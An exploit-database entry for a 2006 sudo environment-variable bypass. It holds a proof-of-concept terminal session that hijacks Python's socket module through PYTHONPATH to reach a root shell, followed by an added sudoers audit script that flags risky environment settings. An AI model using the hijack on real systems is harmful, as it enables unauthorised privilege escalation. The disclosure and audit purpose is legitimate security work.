
Sudo 1.6.x - Environment Variable Handling Security Bypass (2)

Date: 09 Jan 2006 | Reported by: Breno Silva Pinto | Type: exploitdb | Source: www.exploit-db.com

Sudo 1.6.x mishandles environment variables, allowing a local attacker who can run a Python script through sudo to execute arbitrary code with elevated privileges.

Code
source: https://www.securityfocus.com/bid/16184/info
 
Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables.
 
A local attacker with the ability to run Python scripts can exploit this vulnerability to gain access to an interactive Python prompt. That attacker may then execute arbitrary code with elevated privileges, facilitating the complete compromise of affected computers.
 
An attacker must have the ability to run Python scripts through Sudo to exploit this vulnerability.
 
This issue is similar to BID 15394 (Sudo Perl Environment Variable Handling Security Bypass Vulnerability). 

## Sudo local root escalation privilege ##
## vuln versions :  sudo < 1.6.8p10
## adv : https://www.securityfocus.com/bid/16184
## by breno - breno at kalangolinux dot org

## You need sudo access to execute some Python script ##


## First, look at the sudoers file. User 'breno' can execute the expl_python_sudo.py script

breno  ~ $ -> cat /etc/sudoers

breno   ALL=(ALL) /home/breno/expl_python_sudo.py

## Second, see our simple PoC Python script

breno  ~ $ -> cat /home/breno/expl_python_sudo.py
#!/usr/bin/python
import sys
import socket
import os

print "Python Sudo Exploit"
exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
exp.close()
breno  ~ $ ->

## Sexy !! Do nothing :)

## Ok. What you need to do to get root is hijack the socket.py module, change the close()
## function to execute something, and change the PYTHONPATH env.

breno  ~ $ -> cp /usr/lib/python2.3/socket.py /home/breno/

breno  ~ $ -> vi /home/breno/socket.py
...
import os
...
    def close(self):
        os.execl("/bin/sh","/bin/ah");
        self._sock = _closedsocket()
        self.send = self.recv = self.sendto = self.recvfrom = self._sock._dummy
    close.__doc__ = _realsocket.close.__doc__
...

## Ok .. save it and export env

breno  ~ $ -> export PYTHONPATH=/home/breno

## .. and execute script. Too much sexy !!!

breno  ~ $ -> sudo /home/breno/expl_python_sudo.py
Python Sudo Exploit
root  ~ # -> id
uid=0(root) gid=0(root) grupos=0(root)
root  ~ # ->
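
The write-up above works only because the sudo policy lets PYTHONPATH reach the command. As an added example (not part of the original advisory or of sudo), this check parses sudoers text and reports settings that pass the caller's environment through. `audit_sudoers`, the variable list beyond PYTHONPATH and both sample policies are constructed for illustration; `env_reset`, `env_keep`, `setenv` and the `SETENV:` tag are standard sudoers options.

```python
import fnmatch
import re

# Variables that change where an interpreter loads code from. PYTHONPATH is the
# one used on this page; the others are assumptions covering similar cases.
LOADER_VARS = ("PYTHONPATH", "PYTHONHOME", "PYTHONSTARTUP", "PYTHONINSPECT",
               "PERL5LIB", "PERLLIB", "PERL5OPT", "RUBYLIB", "RUBYOPT")
SETTING = re.compile(r'(!?)(\w+)\s*(?:([+-]?=)\s*("[^"]*"|[^,\s]+))?')

def audit_sudoers(text, env_reset_default=True):
    """Return findings about environment handling in sudoers text.
    env_reset_default (assumption, set by the caller): the installed sudo's
    behaviour when sudoers is silent. Continuations/#include are not followed.
    """
    env_reset, kept, findings = env_reset_default, set(), []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"Defaults\S*\s+(.*)", line)
        if not m:
            # User specification: the SETENV tag lets the caller pass variables.
            if re.search(r"\bSETENV:", line):
                findings.append(f"line {lineno}: SETENV tag on a command rule")
            continue
        for neg, name, op, value in SETTING.findall(m.group(1)):
            names = {v.split("=")[0] for v in value.strip('"').split()}
            if name == "env_reset":
                env_reset = not neg
            elif name == "setenv" and not neg:
                findings.append(f"line {lineno}: setenv enabled")
            elif name == "env_keep":
                base = set() if (neg or op == "=") else kept
                kept = base - names if op == "-=" else base | names
    if not env_reset:
        findings.append("env_reset is off: the caller's environment is inherited")
    for pattern in sorted(kept):
        hits = [v for v in LOADER_VARS if fnmatch.fnmatchcase(v, pattern)]
        if hits:
            findings.append(f"env_keep '{pattern}' preserves {', '.join(hits)}")
    return findings

# Constructed sample policies, reusing the rule shown on this page.
RULE = "breno   ALL=(ALL) /home/breno/expl_python_sudo.py\n"
WEAK = 'Defaults !env_reset\nDefaults env_keep += "LANG PYTHON*"\n' + RULE
HARDENED = 'Defaults env_reset\nDefaults env_keep = "LANG LC_ALL"\n' + RULE

if __name__ == "__main__":
    print(audit_sudoers(WEAK), audit_sudoers(HARDENED))
```

The check only tracks variables added to `env_keep` in the text it is given; sudo's built-in keep and removal lists are outside its view.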
